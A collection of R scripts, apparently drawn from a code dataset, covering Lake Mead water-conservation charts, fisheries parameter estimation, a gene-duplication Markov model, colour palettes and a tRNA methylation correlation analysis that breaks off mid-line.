dfICStoDCPMeltMaxWithdrawal <- melt(data = dfICStoDCP,id.vars = "ElevationText", measure.vars = cColNamesICStoDCP[8:10])
ggplot(data=dfICStoDCPMeltMaxWithdrawal %>% filter((ElevationText == "1025 feet") | (ElevationText == "1045 feet") )) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNamesICStoDCP[8:10], labels = cColNames[1:3]) +
scale_x_discrete(labels = cColNames[1:3]) +
scale_y_continuous(labels = scales::percent) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Ratio of ICS max withdrawal\nto DCP target") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
### Ratio of ICS max deposit to DCP target
dfICStoDCPMeltMaxDeposit <- melt(data = dfICStoDCP,id.vars = "ElevationText", measure.vars = cColNamesICStoDCP[11:13])
ggplot(data=dfICStoDCPMeltMaxDeposit %>% filter((ElevationText == "1025 feet") | (ElevationText == "1045 feet") )) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
#Add a horizontal line for 100%
geom_hline(yintercept = 1,linetype="dashed",color="red",size = 0.75) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cColNamesICStoDCP[11:13], labels = cColNames[1:3]) +
#scale_color_manual(name="Guide2", values=c("Black","Black")) +
#scale_fill_continuous(name="Guide1",values = c(palBlues[6],palBlues[9])) +
scale_x_discrete(labels = cColNames[1:3]) +
#scale_x_continuous(breaks=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2),labels=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2)) +
scale_y_continuous(labels = scales::percent) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Ratio of ICS max deposit\nto DCP target") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
### Ratio of largest ICS deposit on record to DCP target
# Get the maximum historical ICS contributions
dfICSMaxDeposit <- dfICSDeposit %>% summarize(maxAZ = max(Arizona), maxCA = max(California), maxNV = max(Nevada))
# Get the DCP contributions for 1045 and 1025 feet
dfDCPcontribute <- dfICStoDCP %>% filter(`Mead Elevation (ft)` == 1045 | `Mead Elevation (ft)` == 1025 )
#Join the two data frames
dfICStoDCPRatio <- dfDCPcontribute
dfICStoDCPRatio$ICSAZ <- dfICSMaxDeposit$maxAZ
dfICStoDCPRatio$ICSCA <- dfICSMaxDeposit$maxCA
dfICStoDCPRatio$ICSNV <- dfICSMaxDeposit$maxNV
dfICStoDCPRatio$AZratio <- dfICStoDCPRatio$ICSAZ / dfICStoDCPRatio$`DCP-AZ Reduction (ac-ft)`
dfICStoDCPRatio$CAratio <- dfICStoDCPRatio$ICSCA / dfICStoDCPRatio$`DCP-CA Reduction (ac-ft)`
dfICStoDCPRatio$NVratio <- dfICStoDCPRatio$ICSNV / dfICStoDCPRatio$`DCP-NV Reduction (ac-ft)`
dfICStoDCPRatio$ElevationText <- paste(dfICStoDCPRatio$`Mead Elevation (ft)`," feet")
cNamesRatio <- colnames(dfICStoDCPRatio)
dfICStoDCPRatioMelt <- melt(data = dfICStoDCPRatio,id.vars = "ElevationText", measure.vars = cNamesRatio[18:20])
ggplot(data=dfICStoDCPRatioMelt ) +
geom_bar(aes(fill=variable,y=value,x=variable), position=position_dodge(), stat="identity") +
#Add a horizontal line for 100%
geom_hline(yintercept = 1,linetype="dashed",color="red",size = 0.75) +
scale_fill_manual(name="Guide1",values = c(palBlues[3],palBlues[6],palBlues[9]),breaks=cNamesRatio[18:20], labels = cColNames[1:3]) +
#scale_color_manual(name="Guide2", values=c("Black","Black")) +
#scale_fill_continuous(name="Guide1",values = c(palBlues[6],palBlues[9])) +
scale_x_discrete(labels = cColNames[1:3]) +
#scale_x_continuous(breaks=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2),labels=seq(min(dfICSDepositMelt$Year),max(dfICSDepositMelt$Year),by=2)) +
scale_y_continuous(labels = scales::percent) +
facet_wrap( ~ ElevationText) +
guides(fill = guide_legend(keywidth = 1, keyheight = 1), color = FALSE) +
theme_bw() +
labs(x="", y="Conservation Capacity\n(ratio of largest ICS deposit to DCP contribution)") +
theme(text = element_text(size=20), legend.title = element_blank(), legend.text=element_text(size=18),
legend.position= c(1.075,0.5))
| |
# Estimate natural mortality (M) and catchability (q) by maximum likelihood.
#
# Minimises the negative log-likelihood 'llfunc2' (defined elsewhere in this
# project) over the two parameters, starting from (10, 1), and returns the
# full 'optim' result including the Hessian.
#
# Args:
#   catch:  catch data, passed through to llfunc2
#   effort: fishing effort data, passed through to llfunc2
#   catchability.scaling.factor: scaling constant, passed through to llfunc2
#
# Returns: the 'optim' result list when convergence is reached; otherwise
#   prints "Convergence failed" and returns 1 (sentinel kept for backward
#   compatibility with existing callers).
EstimateMandQ <- function(catch, effort, catchability.scaling.factor){
  result <- optim(par = c(10, 1), fn = llfunc2, catch = catch, effort = effort,
                  catchability.scaling.factor = catchability.scaling.factor,
                  hessian = TRUE)
  # Plain if/else instead of the previous ifelse() call: ifelse() is meant
  # for vectorised selection, not scalar control flow with side effects.
  if (result$convergence == 0) {
    return(result)
  } else {
    print("Convergence failed")
    return(1)
  }
}
| /Scripts/Obsolete/EstimateMandQ.R | no_license | mkienzle/SurvivalAnalysisForFisheries | R | false | false | 324 | r | EstimateMandQ <- function(catch, effort, catchability.scaling.factor){
result <- optim(par = c(10,1), fn = llfunc2, catch = catch, effort = effort, catchability.scaling.factor = catchability.scaling.factor
, hessian = TRUE)
ifelse(result$convergence == 0, return(result), {print("Convergence failed"); return(1)})
}
|
# Build and Reload Package: 'Ctrl + Shift + B'
# Check Package: 'Ctrl + Shift + E'
# Test Package: 'Ctrl + Shift + T'
#' Neutral model generator
#'
#' This function creates the infinitesimal generator for the model
#'
#'
#' @param N population size
#' @param up Poisson rate of pseudogenization
#' @keywords phylogeny, CNV, neutral model
#' @export
#' @examples
#' Genedupdip_neutralgenerator(N, up)
#' Neutral model generator
#'
#' Builds the infinitesimal generator of the continuous-time Markov chain for
#' the model without neofunctionalization.  A state is a pair (i, j) where i
#' is the number of AAAA individuals, j the number of AAA- individuals and
#' k = N - i - j the number of AA-- individuals.
#'
#' @param N population size
#' @param up Poisson rate of pseudogenization
#' @return list(Q, e1, Pos): sparse generator matrix Q, initial distribution
#'   e1 (all mass on the state with i = 1, j = 0), and the index matrix Pos
#'   mapping each state (i, j) (1-offset indices) to a row/column of Q.
#' @keywords phylogeny, CNV, neutral model
#' @export
#' @examples
#' Genedupdip_neutralgenerator(N, up)
Genedupdip_neutralgenerator <- function(N, up) {
  # Indexing matrix Pos such that Q[Pos[i, j], ] is the row of Q
  # corresponding to state (i - 1, j - 1).
  Pos <- matrix(0, ncol = N + 1, nrow = N + 1)
  count <- 0
  for (i in 1:(N + 1)) {
    for (j in 1:(N + 2 - i)) {
      count <- count + 1
      Pos[i, j] <- count
    }
  }
  # Number of non-zero entries of Q; this must equal the number of triplet
  # writes below, otherwise sparseMatrix() would receive left-over zero
  # indices and fail.
  nonzerolength <- 7 * (N - 2) * (N - 1) / 2 + (N - 1) * 15 + 5
  # Triplet (ii, jj, vv) representation for the sparse Q:
  # Q[ii[n], jj[n]] = vv[n]
  ii <- rep(0, nonzerolength)
  jj <- rep(0, nonzerolength)
  vv <- rep(0, nonzerolength)
  # i is the number of AAAA, j of AAA-, k = N - i - j of AA--.
  # First the 'middle' transitions: i, j and k all strictly positive.
  count1 <- 1
  for (i in 2:N) {  # i - 1 runs over 1:(N - 1); +1 for matrix indexing
    for (j in 2:(N - i + 1)) {
      # When N - i + 1 == 1 the sequence 2:(N - i + 1) runs backwards as
      # c(2, 1); this guard skips those spurious iterations.
      if ((N - i + 1) > 1) {
        k <- N - (i - 1) - (j - 1)  # k is a true count, not an index
        pb <- pbirth(i - 1, j - 1, k, N)  # birth probabilities per type
        pdi <- (i - 1) / N                # death probabilities per type
        pdj <- (j - 1) / N
        pdk <- k / N
        ii[count1:(count1 + 6)] <- Pos[i, j]
        jj[count1:(count1 + 6)] <- c(Pos[i + 1, j], Pos[i + 1, j - 1],
                                     Pos[i - 1, j + 1], Pos[i, j + 1],
                                     Pos[i - 1, j], Pos[i, j - 1], Pos[i, j])
        vv[count1] <- pdk * pb[1]
        vv[count1 + 1] <- pdj * pb[1]
        vv[count1 + 2] <- pdi * pb[2] + 2 * (i - 1) * up
        vv[count1 + 3] <- pdk * pb[2]
        vv[count1 + 4] <- pdi * pb[3]
        vv[count1 + 5] <- pdj * pb[3] + (j - 1) * up
        vv[count1 + 6] <- -sum(vv[count1:(count1 + 5)])  # diagonal entry
        count1 <- count1 + 7
      }
    }
    # Transitions where k == 0 (simplex boundary for this i)
    j <- N - i + 2
    k <- N - (i - 1) - (j - 1)
    if (k != 0) {
      stop("k should be 0 but isn't")
    }
    pb <- pbirth(i - 1, j - 1, k, N)
    pdi <- (i - 1) / N
    pdj <- (j - 1) / N
    pdk <- k / N
    ii[count1:(count1 + 4)] <- Pos[i, j]
    jj[count1:(count1 + 4)] <- c(Pos[i + 1, j - 1], Pos[i - 1, j + 1],
                                 Pos[i, j - 1], Pos[i - 1, j], Pos[i, j])
    vv[count1] <- pdj * pb[1]
    vv[count1 + 1] <- pdi * pb[2] + 2 * (i - 1) * up
    vv[count1 + 2] <- pdj * pb[3] + (j - 1) * up
    vv[count1 + 3] <- pdi * pb[3]
    vv[count1 + 4] <- -sum(vv[count1:(count1 + 3)])
    count1 <- count1 + 5
  }
  # Transitions where i == 0
  i <- 1  # matrix index corresponding to i - 1 == 0
  for (j in 2:N) {
    k <- N - (i - 1) - (j - 1)
    pb <- pbirth(i - 1, j - 1, k, N)
    pdi <- (i - 1) / N
    pdj <- (j - 1) / N
    pdk <- k / N
    ii[count1:(count1 + 4)] <- Pos[i, j]
    jj[count1:(count1 + 4)] <- c(Pos[i, j + 1], Pos[i, j - 1],
                                 Pos[i + 1, j - 1], Pos[i + 1, j], Pos[i, j])
    vv[count1] <- pdk * pb[2]
    vv[count1 + 1] <- pdj * pb[3] + (j - 1) * up
    vv[count1 + 2] <- pdj * pb[1]
    vv[count1 + 3] <- pdk * pb[1]
    vv[count1 + 4] <- -sum(vv[count1:(count1 + 3)])
    count1 <- count1 + 5
  }
  # Transitions where i == N: only pseudogenization is possible here
  i <- N + 1
  j <- 1
  k <- 0
  ii[count1:(count1 + 1)] <- Pos[i, j]
  jj[count1:(count1 + 1)] <- c(Pos[i - 1, j + 1], Pos[i, j])
  vv[count1] <- 2 * (i - 1) * up
  vv[count1 + 1] <- -vv[count1]
  count1 <- count1 + 2
  # Transitions where j == 0
  j <- 1
  for (i in 2:N) {
    k <- N - (i - 1) - (j - 1)
    pb <- pbirth(i - 1, j - 1, k, N)
    pdi <- (i - 1) / N
    pdj <- (j - 1) / N
    pdk <- k / N
    ii[count1:(count1 + 4)] <- Pos[i, j]
    jj[count1:(count1 + 4)] <- c(Pos[i + 1, j], Pos[i - 1, j],
                                 Pos[i, j + 1], Pos[i - 1, j + 1], Pos[i, j])
    vv[count1] <- pdk * pb[1]
    vv[count1 + 1] <- pdi * pb[3]
    vv[count1 + 2] <- pdk * pb[2]
    vv[count1 + 3] <- pdi * pb[2] + 2 * (i - 1) * up
    vv[count1 + 4] <- -sum(vv[count1:(count1 + 3)])
    count1 <- count1 + 5
  }
  # Transitions where j == N; j-type parents can give birth to both other
  # types so pb is still needed (pdj == 1 is implicit and omitted).
  j <- N + 1
  i <- 1
  k <- 0
  pb <- pbirth(i - 1, j - 1, k, N)
  ii[count1:(count1 + 2)] <- Pos[i, j]
  jj[count1:(count1 + 2)] <- c(Pos[i + 1, j - 1], Pos[i, j - 1], Pos[i, j])
  vv[count1] <- pb[1]
  vv[count1 + 1] <- pb[3] + (j - 1) * up
  vv[count1 + 2] <- -vv[count1] - vv[count1 + 1]
  # Bug fix: three entries were written above, so advance the cursor by 3.
  # The original advanced by 2 -- harmless only because this is the last
  # write, but the bookkeeping should stay consistent with nonzerolength.
  count1 <- count1 + 3
  # Finished collecting rates.  Q is the generator matrix; qualify with
  # Matrix:: so the dependency on the Matrix package is explicit.
  Q <- Matrix::sparseMatrix(i = ii, j = jj, x = vv, dims = c(count, count),
                            symmetric = FALSE)
  # e1 is the initial distribution: all mass on state (i = 1, j = 0)
  e1 <- Matrix::sparseMatrix(i = 1, j = Pos[2, 1], x = 1, dims = c(1, count),
                             symmetric = FALSE)
  return(list(Q, e1, Pos))
}
# Probability that the next birth is of type i (AAAA), j (AAA-) or k (AA--),
# given the current population composition (i, j, k) out of N individuals.
# Returns c(P(i-birth), P(j-birth), P(k-birth)); the three values sum to 1.
pbirth <- function(i, j, k, N) {
  # Parent frequencies and the size of the remaining parent pool
  fi <- i / N
  fj <- j / N
  fk <- k / N
  denom <- N - 1
  p_i <- fi * (i - 1) / denom + (1 / 4) * fj * (j - 1) / denom +
    fj * i / denom
  p_j <- fj * k / denom + fj * i / denom +
    (1 / 2) * fj * (j - 1) / denom + 2 * fi * k / denom
  p_k <- fk * (k - 1) / denom + fj * k / denom +
    (1 / 4) * fj * (j - 1) / denom
  c(p_i, p_j, p_k)
}
| /R/Genedupdip_neutralgenerator.R | no_license | peterbchi/CNVSelectR | R | false | false | 5,042 | r | # Build and Reload Package: 'Ctrl + Shift + B'
# Check Package: 'Ctrl + Shift + E'
# Test Package: 'Ctrl + Shift + T'
#' Neutral model generator
#'
#' This function creates the infinitesimal generator for the model
#'
#'
#' @param N population size
#' @param up Poisson rate of pseudogenization
#' @keywords phylogeny, CNV, neutral model
#' @export
#' @examples
#' Genedupdip_neutralgenerator(N, up)
#' Neutral model generator
#'
#' Builds the infinitesimal generator of the continuous-time Markov chain for
#' the model without neofunctionalization.  A state is a pair (i, j) where i
#' is the number of AAAA individuals, j the number of AAA- individuals and
#' k = N - i - j the number of AA-- individuals.
#'
#' @param N population size
#' @param up Poisson rate of pseudogenization
#' @return list(Q, e1, Pos): sparse generator matrix Q, initial distribution
#'   e1 (all mass on the state with i = 1, j = 0), and the index matrix Pos
#'   mapping each state (i, j) (1-offset indices) to a row/column of Q.
#' @keywords phylogeny, CNV, neutral model
#' @export
#' @examples
#' Genedupdip_neutralgenerator(N, up)
Genedupdip_neutralgenerator <- function(N, up) {
  # Indexing matrix Pos such that Q[Pos[i, j], ] is the row of Q
  # corresponding to state (i - 1, j - 1).
  Pos <- matrix(0, ncol = N + 1, nrow = N + 1)
  count <- 0
  for (i in 1:(N + 1)) {
    for (j in 1:(N + 2 - i)) {
      count <- count + 1
      Pos[i, j] <- count
    }
  }
  # Number of non-zero entries of Q; this must equal the number of triplet
  # writes below, otherwise sparseMatrix() would receive left-over zero
  # indices and fail.
  nonzerolength <- 7 * (N - 2) * (N - 1) / 2 + (N - 1) * 15 + 5
  # Triplet (ii, jj, vv) representation for the sparse Q:
  # Q[ii[n], jj[n]] = vv[n]
  ii <- rep(0, nonzerolength)
  jj <- rep(0, nonzerolength)
  vv <- rep(0, nonzerolength)
  # i is the number of AAAA, j of AAA-, k = N - i - j of AA--.
  # First the 'middle' transitions: i, j and k all strictly positive.
  count1 <- 1
  for (i in 2:N) {  # i - 1 runs over 1:(N - 1); +1 for matrix indexing
    for (j in 2:(N - i + 1)) {
      # When N - i + 1 == 1 the sequence 2:(N - i + 1) runs backwards as
      # c(2, 1); this guard skips those spurious iterations.
      if ((N - i + 1) > 1) {
        k <- N - (i - 1) - (j - 1)  # k is a true count, not an index
        pb <- pbirth(i - 1, j - 1, k, N)  # birth probabilities per type
        pdi <- (i - 1) / N                # death probabilities per type
        pdj <- (j - 1) / N
        pdk <- k / N
        ii[count1:(count1 + 6)] <- Pos[i, j]
        jj[count1:(count1 + 6)] <- c(Pos[i + 1, j], Pos[i + 1, j - 1],
                                     Pos[i - 1, j + 1], Pos[i, j + 1],
                                     Pos[i - 1, j], Pos[i, j - 1], Pos[i, j])
        vv[count1] <- pdk * pb[1]
        vv[count1 + 1] <- pdj * pb[1]
        vv[count1 + 2] <- pdi * pb[2] + 2 * (i - 1) * up
        vv[count1 + 3] <- pdk * pb[2]
        vv[count1 + 4] <- pdi * pb[3]
        vv[count1 + 5] <- pdj * pb[3] + (j - 1) * up
        vv[count1 + 6] <- -sum(vv[count1:(count1 + 5)])  # diagonal entry
        count1 <- count1 + 7
      }
    }
    # Transitions where k == 0 (simplex boundary for this i)
    j <- N - i + 2
    k <- N - (i - 1) - (j - 1)
    if (k != 0) {
      stop("k should be 0 but isn't")
    }
    pb <- pbirth(i - 1, j - 1, k, N)
    pdi <- (i - 1) / N
    pdj <- (j - 1) / N
    pdk <- k / N
    ii[count1:(count1 + 4)] <- Pos[i, j]
    jj[count1:(count1 + 4)] <- c(Pos[i + 1, j - 1], Pos[i - 1, j + 1],
                                 Pos[i, j - 1], Pos[i - 1, j], Pos[i, j])
    vv[count1] <- pdj * pb[1]
    vv[count1 + 1] <- pdi * pb[2] + 2 * (i - 1) * up
    vv[count1 + 2] <- pdj * pb[3] + (j - 1) * up
    vv[count1 + 3] <- pdi * pb[3]
    vv[count1 + 4] <- -sum(vv[count1:(count1 + 3)])
    count1 <- count1 + 5
  }
  # Transitions where i == 0
  i <- 1  # matrix index corresponding to i - 1 == 0
  for (j in 2:N) {
    k <- N - (i - 1) - (j - 1)
    pb <- pbirth(i - 1, j - 1, k, N)
    pdi <- (i - 1) / N
    pdj <- (j - 1) / N
    pdk <- k / N
    ii[count1:(count1 + 4)] <- Pos[i, j]
    jj[count1:(count1 + 4)] <- c(Pos[i, j + 1], Pos[i, j - 1],
                                 Pos[i + 1, j - 1], Pos[i + 1, j], Pos[i, j])
    vv[count1] <- pdk * pb[2]
    vv[count1 + 1] <- pdj * pb[3] + (j - 1) * up
    vv[count1 + 2] <- pdj * pb[1]
    vv[count1 + 3] <- pdk * pb[1]
    vv[count1 + 4] <- -sum(vv[count1:(count1 + 3)])
    count1 <- count1 + 5
  }
  # Transitions where i == N: only pseudogenization is possible here
  i <- N + 1
  j <- 1
  k <- 0
  ii[count1:(count1 + 1)] <- Pos[i, j]
  jj[count1:(count1 + 1)] <- c(Pos[i - 1, j + 1], Pos[i, j])
  vv[count1] <- 2 * (i - 1) * up
  vv[count1 + 1] <- -vv[count1]
  count1 <- count1 + 2
  # Transitions where j == 0
  j <- 1
  for (i in 2:N) {
    k <- N - (i - 1) - (j - 1)
    pb <- pbirth(i - 1, j - 1, k, N)
    pdi <- (i - 1) / N
    pdj <- (j - 1) / N
    pdk <- k / N
    ii[count1:(count1 + 4)] <- Pos[i, j]
    jj[count1:(count1 + 4)] <- c(Pos[i + 1, j], Pos[i - 1, j],
                                 Pos[i, j + 1], Pos[i - 1, j + 1], Pos[i, j])
    vv[count1] <- pdk * pb[1]
    vv[count1 + 1] <- pdi * pb[3]
    vv[count1 + 2] <- pdk * pb[2]
    vv[count1 + 3] <- pdi * pb[2] + 2 * (i - 1) * up
    vv[count1 + 4] <- -sum(vv[count1:(count1 + 3)])
    count1 <- count1 + 5
  }
  # Transitions where j == N; j-type parents can give birth to both other
  # types so pb is still needed (pdj == 1 is implicit and omitted).
  j <- N + 1
  i <- 1
  k <- 0
  pb <- pbirth(i - 1, j - 1, k, N)
  ii[count1:(count1 + 2)] <- Pos[i, j]
  jj[count1:(count1 + 2)] <- c(Pos[i + 1, j - 1], Pos[i, j - 1], Pos[i, j])
  vv[count1] <- pb[1]
  vv[count1 + 1] <- pb[3] + (j - 1) * up
  vv[count1 + 2] <- -vv[count1] - vv[count1 + 1]
  # Bug fix: three entries were written above, so advance the cursor by 3.
  # The original advanced by 2 -- harmless only because this is the last
  # write, but the bookkeeping should stay consistent with nonzerolength.
  count1 <- count1 + 3
  # Finished collecting rates.  Q is the generator matrix; qualify with
  # Matrix:: so the dependency on the Matrix package is explicit.
  Q <- Matrix::sparseMatrix(i = ii, j = jj, x = vv, dims = c(count, count),
                            symmetric = FALSE)
  # e1 is the initial distribution: all mass on state (i = 1, j = 0)
  e1 <- Matrix::sparseMatrix(i = 1, j = Pos[2, 1], x = 1, dims = c(1, count),
                             symmetric = FALSE)
  return(list(Q, e1, Pos))
}
# Probability that the next birth is of type i (AAAA), j (AAA-) or k (AA--),
# given the current population composition (i, j, k) out of N individuals.
# Returns c(P(i-birth), P(j-birth), P(k-birth)); the three values sum to 1.
pbirth <- function(i, j, k, N) {
  # Parent frequencies and the size of the remaining parent pool
  fi <- i / N
  fj <- j / N
  fk <- k / N
  denom <- N - 1
  p_i <- fi * (i - 1) / denom + (1 / 4) * fj * (j - 1) / denom +
    fj * i / denom
  p_j <- fj * k / denom + fj * i / denom +
    (1 / 2) * fj * (j - 1) / denom + 2 * fi * k / denom
  p_k <- fk * (k - 1) / denom + fj * k / denom +
    (1 / 4) * fj * (j - 1) / denom
  c(p_i, p_j, p_k)
}
|
# Plot templates:
# Colour schemes
# Each palette is a data frame of RGB triplets (one column per colour,
# values 0-255) rescaled to the [0, 1] range expected by R colour functions.
# rm(list = setdiff(ls(), keep))
# dual - cadet-red
dual1.light <- data.frame("c" = c(64, 127, 127), "r" = c(212, 106, 106)) / 255
dual1.dark <- data.frame("c" = c(13, 77, 77), "r" = c(128, 21, 21)) / 255
dual1.mixed <- data.frame("c" = c(64, 127, 127), "r" = c(128, 21, 21)) / 255
# dual2 - midnightblue-coral
dual2 <- data.frame("m" = c(25, 25, 112), "c" = c(243, 115, 112)) / 255
# Bare expression: auto-prints only when this file is run interactively
# (quick visual check of the palette; has no effect under source()).
dual1.light[, 1]
# triadic1 - rainbow
rgb.triad1 <- data.frame("g" = c(0, 157, 125), "o" = c(247, 172, 0), "v" = c(125, 037, 128))
triad1 <- rgb.triad1/255
triad1
# triadic2 - teal-mulberry
rgb.triad2 <- data.frame("t" = c(71, 142, 117), "m" = c(172, 86, 133), "y" = c(212, 202, 106))
triad2 <- rgb.triad2/255
triad2
# NOTE(review): 'keep' is not defined in this file -- presumably a character
# vector of object names set by the calling script before sourcing this
# file; confirm, otherwise setdiff(ls(), keep) errors.
colourscheme.names <- setdiff(ls(), keep)
cat("Thank you. Colour schemes succesfully imported.")
| /FilopodyanR/ColourSchemes.R | no_license | gurdon-institute/Filopodyan | R | false | false | 865 | r | # Plot templates:
# Colour schemes
# rm(list = setdiff(ls(), keep))
# dual - cadet-red
dual1.light <- data.frame("c" = c(64, 127, 127), "r" = c(212, 106, 106)) / 255
dual1.dark <- data.frame("c" = c(13, 77, 77), "r" = c(128, 21, 21)) / 255
dual1.mixed <- data.frame("c" = c(64, 127, 127), "r" = c(128, 21, 21)) / 255
# dual2 - midnightblue-coral
dual2 <- data.frame("m" = c(25, 25, 112), "c" = c(243, 115, 112)) / 255
dual1.light[, 1]
# triadic1 - rainbow
rgb.triad1 <- data.frame("g" = c(0, 157, 125), "o" = c(247, 172, 0), "v" = c(125, 037, 128))
triad1 <- rgb.triad1/255
triad1
# triadic2 - teal-mulberry
rgb.triad2 <- data.frame("t" = c(71, 142, 117), "m" = c(172, 86, 133), "y" = c(212, 202, 106))
triad2 <- rgb.triad2/255
triad2
colourscheme.names <- setdiff(ls(), keep)
cat("Thank you. Colour schemes succesfully imported.")
|
# Extract the chromosome identifier (e.g. "12", "X") from a sequence name
# such as "chr12_random": keep the token before the first "_", "." or "-",
# then drop the leading "chr" prefix (characters 4-5 of that token).
change_chr <- function(chromosome) {
  lead_token <- strsplit(chromosome, "_|\\.|-")[[1]][1]
  substr(lead_token, 4, 5)
}
# Filter amino-acid rows and apply a variance-stabilising transformation.
#
# Rows of 'data' are kept only when their name starts with a code of the
# form "i?XyzABC" (optional "i" prefix, capitalised three-letter amino acid,
# three-letter anticodon), e.g. "AlaAGC" or "iMetCAT".
#
# Args:
#   data:   data frame (samples in columns, tRNA features in rows)
#   transf: one of "log", "arcsinh", "sqrt" (element-wise transforms) or
#           "rel" (per-amino-acid relative abundance); any other value
#           returns the filtered data unchanged.
#
# Returns: a matrix for the element-wise transforms (row names preserved),
#   a data frame for "rel", or the filtered input for an unknown 'transf'.
transformdata <- function(data, transf) {
  # grepl() with a "^" anchor is equivalent to regexpr(...) == 1 (the match
  # must start at the first character) but states the intent directly.
  aa_idx <- grepl("^i?[A-Z][a-z]{2}[A-Z]{3}", rownames(data))
  data <- data[aa_idx, ]
  if (transf == "log") {
    outdata <- sapply(data, log)
    # log(0) gives -Inf; recode as NaN so downstream na.rm handling works
    outdata[outdata == -Inf] <- NaN
    rownames(outdata) <- rownames(data)
  } else if (transf == "arcsinh") {
    outdata <- sapply(data, asinh)
    rownames(outdata) <- rownames(data)
  } else if (transf == "sqrt") {
    outdata <- sapply(data, sqrt)
    rownames(outdata) <- rownames(data)
  } else if (transf == "rel") {
    # Relative abundance within each amino acid: each row is divided by the
    # per-sample total over all rows of the same amino acid.
    outdata <- data.frame(matrix(ncol = ncol(data), nrow = nrow(data)),
                          row.names = rownames(data))
    colnames(outdata) <- colnames(data)
    # Amino acid = row name minus its trailing 3-letter anticodon
    aa <- sapply(rownames(outdata), function(x) substr(x, 1, nchar(x) - 3))
    uniqueaa <- unique(aa)
    for (n in uniqueaa) {
      idx <- (aa %in% n)
      idx_data <- matrix(as.matrix(data[idx, ]), ncol = ncol(data), nrow = sum(idx))
      total <- colSums(idx_data)
      outdata[idx, ] <- t(apply(idx_data, 1, function(x) x / total))
      # Samples whose total is zero would give 0/0; assign the uniform
      # share 1/(number of rows in the group) instead.
      iszero <- (total %in% 0)
      if (any(iszero)) {
        outdata[idx, iszero] <- 1.0 / sum(idx)
      }
    }
  } else {
    outdata <- data
  }
  return(outdata)
}
# Collapse rows sharing the same anticodon into their per-column mean.
# The anticodon label is the second "-"-separated token of each row name.
# Returns a matrix with one row per unique anticodon (NAs ignored).
mean_anticodon <- function(df) {
  acod <- vapply(rownames(df), function(nm) strsplit(nm, "-")[[1]][2],
                 character(1))
  per_acod <- sapply(unique(acod),
                     function(a) colMeans(df[acod == a, ], na.rm = TRUE))
  t(per_acod)
}
# Load data
cancer_types = c(BRCA="BRCA",PRAD="PRAD",kidney="KICH;KIRP;KIRC",lung="LUAD;LUSC",HNSC="HNSC",uterus="UCEC;CESC",
liver="LIHC;CHOL",THCA="THCA",colorectal="COAD;READ",ESCA="ESCA",STAD="STAD",BLCA="BLCA",PAAD="PAAD",THYM="THYM",
SKCM="SKCM",PCPG="PCPG")
path="/users/lserrano/xhernandez/tRNA_methylation/"
# tRNA gene coordinates (BED12); column 4 (gene name) becomes the row names
trna_coord = read.csv(paste0(path,"Data/Genomes/H.sapiens/hg19.tRNAscan.bed12"), sep="\t", header = F, row.names = 4)
# Reduce the chromosome field (e.g. "chr12_random") to its bare identifier
trna_coord$V1 = sapply(as.character(trna_coord$V1),change_chr)
# tRNAs
trna = read.csv("data/TCGAall_nomod.csv",row.names = 1)
# Square-root transform of the expression values (see transformdata above)
anticodon = transformdata(trna,"sqrt")
# Keep unique coordinates
genes = rownames(unique(trna_coord[,c(1,2,3)]))
## Analyze methylation
# Drop any stale accumulator from a previous run (warns if absent)
rm(rawvalues)
# Concatenate the per-cancer-type methylation tables column-wise
for (type in names(cancer_types)){
  # Get data
  if (exists("rawvalues")){
    add = read.csv(sprintf("%sResults/%s_trnas_TSS1500meth.csv",path,type), row.names = 1)
    rawvalues = cbind(rawvalues,add)
  }else{
    rawvalues = read.csv(sprintf("%sResults/%s_trnas_TSS1500meth.csv",path,type), row.names = 1)
  }
}
# Average by anticodons
rawvalues = rawvalues[genes,]
values = mean_anticodon(rawvalues)
# Match samples
# NOTE(review): fields 2:5 of the dot-separated expression column names are
# assumed to form the sample barcode, and the methylation sample ID its
# first 16 characters -- confirm against the actual input headers.
trna_samples = sapply(colnames(anticodon), function(x) paste(strsplit(x,"\\.")[[1]][2:5],collapse="."))
value_samples = substr(colnames(values),1,16)
merged_trna = colnames(anticodon)[trna_samples %in% value_samples]
merged_value_idx = sapply(trna_samples[trna_samples %in% value_samples], function(x) which(x==value_samples))
# Match anticodons
acods = rownames(values)[rownames(values) %in% rownames(anticodon)]
# Calculate correlation with expression
correlations = data.frame(sapply(acods,function(x) cor(anticodon[x,merged_trna],
values[x,merged_value_idx],method = "spearman",use="na.or.complete")))
colnames(correlations) = "Spearman Methylation"
write.csv(correlations,"results/trnaH_methylation_corr_allsamples.csv")
## Analyze CNA
path="/users/lserrano/xhernandez/tRNA_scna/"
# Drop the methylation accumulator before re-filling with the CNA tables
rm(rawvalues)
for (type in names(cancer_types)){
  # Get data
  if (exists("rawvalues")){
    add = read.csv(sprintf("%sResults/%s_trnas_cna.csv",path,type), row.names = 1)
    rawvalues = cbind(rawvalues,add)
  }else{
    rawvalues = read.csv(sprintf("%sResults/%s_trnas_cna.csv",path,type), row.names = 1)
  }
}
# Average by anticodons
rawvalues = rawvalues[genes,]
values = mean_anticodon(rawvalues)
# Match samples (same barcode conventions as the methylation section above)
trna_samples = sapply(colnames(anticodon), function(x) paste(strsplit(x,"\\.")[[1]][2:5],collapse="."))
value_samples = substr(colnames(values),1,16)
merged_trna = colnames(anticodon)[trna_samples %in% value_samples]
merged_value_idx = sapply(trna_samples[trna_samples %in% value_samples], function(x) which(x==value_samples))
# Match anticodons
acods = rownames(values)[rownames(values) %in% rownames(anticodon)]
# Calculate correlation with expression
correlations = data.frame(sapply(acods,function(x) cor(anticodon[x,merged_trna],
